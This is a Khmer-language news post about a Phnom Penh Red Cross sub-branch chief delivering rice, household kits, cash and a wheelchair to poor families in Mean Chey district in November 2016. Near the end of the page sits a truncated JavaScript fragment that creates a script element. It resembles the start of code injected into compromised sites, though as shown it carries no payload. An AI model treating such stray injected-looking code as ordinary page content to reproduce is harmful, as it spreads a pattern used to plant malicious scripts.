Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លោក ឌី រ័ត្នខេមរុណ ប្រធានអនុសាខាកាកបាទក្រហមខណ្ឌមានជ័យ ចុះសួរសុខទុក្ខ និងនាំយកអំណោយជូនបងប្អូនប្រជាពលរដ្ឋទីទាល់ក្រតាមខ្នងផ្ទះ

ភ្នំពេញ៖ ក្រុមការងារអនុសាខាកាកបាទក្រហមកម្ពុជាខណ្ឌមានជ័យ រាជធានីភ្នំពេញ ដឹកនាំដោយលោក ឌី រ័ត្នខេមរុណ ប្រធានគណៈកម្មាធិការអនុសាខា បានចុះសួរសុខទុក្ខ និងនាំយកអំណោយមនុស្សធម៌របស់សម្តេច កិតិ្តព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ប្រធានកាកបាទក្រហមកម្ពុជា ទៅចែកជូនដល់ខ្នងផ្ទះប្រជាពលរដ្ឋ ចាស់ជរា ទីទ័លក្រ មានជីវភាពខ្វះខាត ចំនួន១០គ្រួសារ (ចំនួន៨ ភូមិ)ក្នុងសង្កាត់ចាក់អង្រែលេី នៅព្រឹកថ្ងៃទី២ ខែវិច្ចកាឆ្នាំ២០១៦ ។

លោក ឌី រ័ត្នខេមរុណប្រធានគណៈកម្មាធិការអនុសាខា បានលើកឡើងពីការយកចិត្តទុកដាក់គិតគូរសុខទុក្ខប្រជាពលរដ្ឋនៅតាមមូលដ្ឋានពីសំណាក់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិតប្រធានកាកបាទក្រហមកម្ពុជា ដោយមិនប្រកាន់ពីនិន្នាការនយោបាយ ជាតិសាសន៍ សាសនា វណ្ណៈ ពណ៌សម្បុរអ្វីឡើយ ។ លោក បានបន្តថា សុខទុក្ខប្រជាពលរដ្ឋនិង សុខទុក្ខសម្ដេចកិត្តិព្រឹទ្ធបណ្ឌិត គឺតែមួយ។

អំណោយមនុស្សធម៌ដែលបានផ្តល់ជូន ក្នុង១គ្រួសារៗទទួលបាន ៖
អង្ករ ៣០គីឡូ ឃិត១(មុង ភួយ ក្រមារ សារ៉ុង )  មី១កេស ត្រី ខ ១យួរ ទឹកសុីអុីវ១យួរ និងថវិកា ៣មុឺនរៀល៕

ខណៈដែលលោកចុះផ្ទាល់តាមបណ្តាភូមិក្នុងសង្កាត់ បានជួបសំណេះសំណាលជាមួយបងស្រីពិការជេីងម្នាក់ ដោយមេីលឃេីញជាក់ស្តែងពីទុក្ខលំបាកបងស្រីម្នាក់ជួបគ្រោះថ្នាក់ចរាចរណ៍ពិការជេីង លោក ឌី រ័ត្នខេមរុណ បានប្រគល់ជូននូវរទេះរុញថ្មីមួយគ្រឿងដែលជាថវិកាផ្ទាល់ខ្លួនរបស់លោក។ នេះ ស្តែងអោយឃេីញពីការយកចិត្តទុកដាក់របស់ថ្នាក់ដឹកនាំ ចំពោះពលរដ្ឋដែលកំពុងមានទុក្ខលំបាក៕

img_5181 img_5185 img_5188 img_5194

img_5164 img_5175

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More